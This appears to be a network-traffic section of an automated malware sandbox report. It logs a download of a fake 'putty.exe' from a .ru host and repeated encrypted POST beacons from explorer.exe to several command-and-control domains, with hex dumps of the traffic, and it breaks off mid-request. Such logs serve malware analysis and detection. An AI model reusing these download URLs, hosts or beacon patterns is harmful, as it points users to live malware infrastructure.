                                                                                                Dec 18, 2024 09:23:20.414566994 CET1236INData Raw: c0 94 20 f0 7f 4e 9f e7 ff 00 d7 41 63 b8 30 e4 74 eb df bd 1c ba 58 39 8b 9e 60 65 6d df 36 79 fc ff 00 c4 d4 6e e1 88 c0 fa 1e f5 5b ce e3 68 6d dc f0 0f 1d 3d ba ff 00 fa ea 2d d9 c0 56 0c 7d bb 50 ca 8c cb 62 46 50 30 4b 15 c1 c1 eb cf bd 34
                                                                                                Data Ascii: NAc0tX9`em6yn[hm=-V}PbFP0K4M*6TlApsqhP3M2lW3PKwC8M"|X9H{olpx3hx8S~E\$TpO_5ZG
                                                                                                Dec 18, 2024 09:23:21.695987940 CET64OUTGET /fdjskf88cvt/putty.exe HTTP/1.1
                                                                                                Host: spotcarservice.ru
                                                                                                Dec 18, 2024 09:23:22.147803068 CET1236INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Wed, 18 Dec 2024 08:23:21 GMT
                                                                                                Content-Type: application/x-msdos-program
                                                                                                Content-Length: 331264
                                                                                                Connection: keep-alive
                                                                                                Last-Modified: Wed, 18 Dec 2024 06:47:16 GMT
                                                                                                ETag: "50e00-62985c8c4e500"
                                                                                                Accept-Ranges: bytes
                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 22 d9 df c2 66 b8 b1 91 66 b8 b1 91 66 b8 b1 91 78 ea 24 91 7c b8 b1 91 78 ea 35 91 54 b8 b1 91 78 ea 32 91 e1 b8 b1 91 41 7e ca 91 65 b8 b1 91 66 b8 b0 91 e6 b8 b1 91 78 ea 3b 91 67 b8 b1 91 78 ea 25 91 67 b8 b1 91 78 ea 20 91 67 b8 b1 91 52 69 63 68 66 b8 b1 91 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b4 5c e9 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6c 04 00 00 0e 01 00 00 00 00 00 e7 88 00 00 00 10 00 00 00 80 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 05 00 00 04 00 00 23 c5 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$"fffx$|x5Tx2A~efx;gx%gx gRichfPEL\dl@# p(@98@.textjl `.datadp@.rsrc9@:@@


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.54976694.156.177.51801028C:\Windows\explorer.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Dec 18, 2024 09:23:51.826559067 CET281OUTPOST / HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Accept: */*
                                                                                                Referer: http://waaliasqugu.org/
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                Content-Length: 317
                                                                                                Host: constractionscity1991.lat
                                                                                                Dec 18, 2024 09:23:51.826590061 CET317OUTData Raw: a1 5f 79 54 85 4b 2b b1 ba 3c d5 ca fc b2 53 46 21 42 b4 5b 65 ce 42 52 ae 56 c8 1f 01 8c 77 51 cf 54 da fd 4c a7 06 4b 5f bc cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 80 2e 71 d1
                                                                                                Data Ascii: _yTK+<SF!B[eBRVwQTLK_M.x]2m-^JrC).qSF?`eS-* #doM9[k!&(nRmVhr 68`Ky9s>cL)">L)3X;8p8fc5^GnPoaJsa& t
                                                                                                Dec 18, 2024 09:23:53.373068094 CET595INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Wed, 18 Dec 2024 08:23:53 GMT
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.54977294.156.177.51801028C:\Windows\explorer.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Dec 18, 2024 09:23:53.770353079 CET286OUTPOST / HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Accept: */*
                                                                                                Referer: http://qrjxfdbwvthlvm.com/
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                Content-Length: 354
                                                                                                Host: restructurisationservice.ru
                                                                                                Dec 18, 2024 09:23:53.770382881 CET354OUTData Raw: a1 5f 79 54 85 4b 2b b1 ba 3c d5 ca fc b2 53 46 21 42 b4 5b 65 ce 42 52 ae 56 c8 1f 01 8c 77 51 cf 54 da fd 4c a7 06 4b 5f bc cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be a7 17 2c a9
                                                                                                Data Ascii: _yTK+<SF!B[eBRVwQTLK_M.x]2m-^JrC),FU!/dbrPB1F9c%Tk5W}rq6t7tn(#AyS #b|w]#rIkw08py$t]aoRA]
                                                                                                Dec 18, 2024 09:23:55.347723007 CET597INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Wed, 18 Dec 2024 08:23:55 GMT
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.549778109.70.26.37801028C:\Windows\explorer.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Dec 18, 2024 09:23:55.858339071 CET282OUTPOST / HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Accept: */*
                                                                                                Referer: http://hrmdrefrhxsklmy.net/
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                Content-Length: 185
                                                                                                Host: connecticutproperty.ru
                                                                                                Dec 18, 2024 09:23:55.858436108 CET185OUTData Raw: a1 5f 79 54 85 4b 2b b1 ba 3c d5 ca fc b2 53 46 21 42 b4 5b 65 ce 42 52 ae 56 c8 1f 01 8c 77 51 cf 54 da fd 4c a7 06 4b 5f bc cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be e4 18 41 a4
                                                                                                Data Ascii: _yTK+<SF!B[eBRVwQTLK_M.x]2m-^JrC)AI\BPjYM 6@D=kRyA|7s!O1BVkjq$!--i
                                                                                                Dec 18, 2024 09:23:57.193710089 CET300INHTTP/1.1 405 Not Allowed
                                                                                                Server: nginx
                                                                                                Date: Wed, 18 Dec 2024 08:23:56 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 150
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.54993094.156.177.51801028C:\Windows\explorer.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Dec 18, 2024 09:25:02.168277979 CET281OUTPOST / HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Accept: */*
                                                                                                Referer: http://ldsjjyyryte.org/
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                Content-Length: 327
                                                                                                Host: constractionscity1991.lat
                                                                                                Dec 18, 2024 09:25:02.168294907 CET327OUTData Raw: a1 5f 79 54 85 4b 2b b1 ba 3c d5 ca fc b2 53 46 21 42 b4 5b 65 ce 42 52 ae 56 c8 1f 01 8c 77 51 cf 54 da fd 4c a7 06 4b 5f bc cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be bc 09 31 8a
                                                                                                Data Ascii: _yTK+<SF!B[eBRVwQTLK_M.x]2m-^JrC)1._N8rlc7C#}=[$'(#6;I[z](rg^C,?Ua22Ryk-dgKbx]!iI8?P}=Zx%^
                                                                                                Dec 18, 2024 09:25:03.517447948 CET595INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Wed, 18 Dec 2024 08:25:03 GMT
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.54993694.156.177.51801028C:\Windows\explorer.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Dec 18, 2024 09:25:03.656486988 CET285OUTPOST / HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Accept: */*
                                                                                                Referer: http://pmgidbasrntuh.org/
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                Content-Length: 147
                                                                                                Host: restructurisationservice.ru
                                                                                                Dec 18, 2024 09:25:03.659773111 CET147OUTData Raw: a1 5f 79 54 85 4b 2b b1 ba 3c d5 ca fc b2 53 46 21 42 b4 5b 65 ce 42 52 ae 56 c8 1f 01 8c 77 51 cf 54 da fd 4c a7 06 4b 5f bc cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be a2 19 6c ad
                                                                                                Data Ascii: _yTK+<SF!B[eBRVwQTLK_M.x]2m-^JrC)lzJw s-%#;QjmH~y`IAV
                                                                                                Dec 18, 2024 09:25:05.158297062 CET597INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Wed, 18 Dec 2024 08:25:04 GMT
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.549938109.70.26.37801028C:\Windows\explorer.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Dec 18, 2024 09:25:05.281310081 CET281OUTPOST / HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Accept: */*
                                                                                                Referer: http://yxfqkjutumbric.org/
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                Content-Length: 161
                                                                                                Host: connecticutproperty.ru
                                                                                                Dec 18, 2024 09:25:05.281353951 CET161OUTData Raw: a1 5f 79 54 85 4b 2b b1 ba 3c d5 ca fc b2 53 46 21 42 b4 5b 65 ce 42 52 ae 56 c8 1f 01 8c 77 51 cf 54 da fd 4c a7 06 4b 5f bc cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 8b 4d 25 92
                                                                                                Data Ascii: _yTK+<SF!B[eBRVwQTLK_M.x]2m-^JrC)M%J`)S_B{2:Rx=\*LH>2o52S6lRp7}X5
                                                                                                Dec 18, 2024 09:25:06.609590054 CET300INHTTP/1.1 405 Not Allowed
                                                                                                Server: nginx
                                                                                                Date: Wed, 18 Dec 2024 08:25:06 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 150
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                7192.168.2.54994494.156.177.51801028C:\Windows\explorer.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Dec 18, 2024 09:25:07.240746975 CET281OUTPOST / HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Accept: */*
                                                                                                Referer: http://ttviunnjnhq.net/
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                Content-Length: 223
                                                                                                Host: constractionscity1991.lat
                                                                                                Dec 18, 2024 09:25:07.240771055 CET223OUTData Raw: a1 5f 79 54 85 4b 2b b1 ba 3c d5 ca fc b2 53 46 21 42 b4 5b 65 ce 42 52 ae 56 c8 1f 01 8c 77 51 cf 54 da fd 4c a7 06 4b 5f bc cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be f8 27 34 d0
                                                                                                Data Ascii: _yTK+<SF!B[eBRVwQTLK_M.x]2m-^JrC)'4[cJAevW1p}]/]qu@gE0EJ'6h_9&nM65[oNOs~>
                                                                                                Dec 18, 2024 09:25:08.593101025 CET595INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Wed, 18 Dec 2024 08:25:08 GMT
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                8192.168.2.54994994.156.177.51801028C:\Windows\explorer.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Dec 18, 2024 09:25:08.719189882 CET286OUTPOST / HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Accept: */*
                                                                                                Referer: http://oswckeqrobwxxb.org/
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                Content-Length: 199
                                                                                                Host: restructurisationservice.ru
                                                                                                Dec 18, 2024 09:25:08.719211102 CET199OUTData Raw: a1 5f 79 54 85 4b 2b b1 ba 3c d5 ca fc b2 53 46 21 42 b4 5b 65 ce 42 52 ae 56 c8 1f 01 8c 77 51 cf 54 da fd 4c a7 06 4b 5f bc cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be fa 13 21 91
                                                                                                Data Ascii: _yTK+<SF!B[eBRVwQTLK_M.x]2m-^JrC)!#bm"Y>@I<iJ2T"0]+n0}tL:RAs2bBlK:oFklw)~N
                                                                                                Dec 18, 2024 09:25:10.238723040 CET597INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Wed, 18 Dec 2024 08:25:10 GMT
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                9192.168.2.549955109.70.26.37801028C:\Windows\explorer.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Dec 18, 2024 09:25:10.362344980 CET283OUTPOST / HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Accept: */*
                                                                                                Referer: http://mhwsrcytivmhoptq.com/
